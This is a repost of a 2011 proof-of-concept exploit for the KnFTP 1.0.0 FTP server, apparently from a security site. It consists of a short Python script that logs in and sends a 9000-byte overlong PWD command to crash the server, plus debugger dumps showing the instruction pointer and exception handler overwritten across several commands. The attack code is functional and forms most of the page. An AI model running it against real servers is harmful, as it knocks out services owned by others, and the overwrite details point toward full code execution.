首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)
来源:vfocus.net 作者:loneferret 发布时间:2011-09-19  

#!/usr/bin/python

# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/

# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
 
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwriten.
# It's almost like this application was made to be vulnerable.
# Anyway have fun.

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "MKD"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFE
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "LS"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFF
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

#SEH chain of thread 000001BC, item 0
#Address=00C7FFDC
#SE handler=41414141

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "ABOR"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFD
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDD000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


import socket
 
 
buffer = "\x41" * 9000
 
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('PWD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MY MP3 Player 3.0 m3u Exploit
·Audio Gold Local Buffer Overfl
·RealNetworks Realplayer QCP Pa
·Switch Media Editor(.m3u) Loca
·Measuresoft ScadaPro <= 4.0.0
·ALL IN 1 MOBILE VIDEO Denial o
·Mini-Stream Ripper 2.9.7 DEP B
·Rever Audio Converter(avi To w
·3GP Video Converter Local Buff
·AMADIS Video Converter SEH Buf
·webadmin <= Shell Upload Vulne
·Audio Gold Local Buffer Overfl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved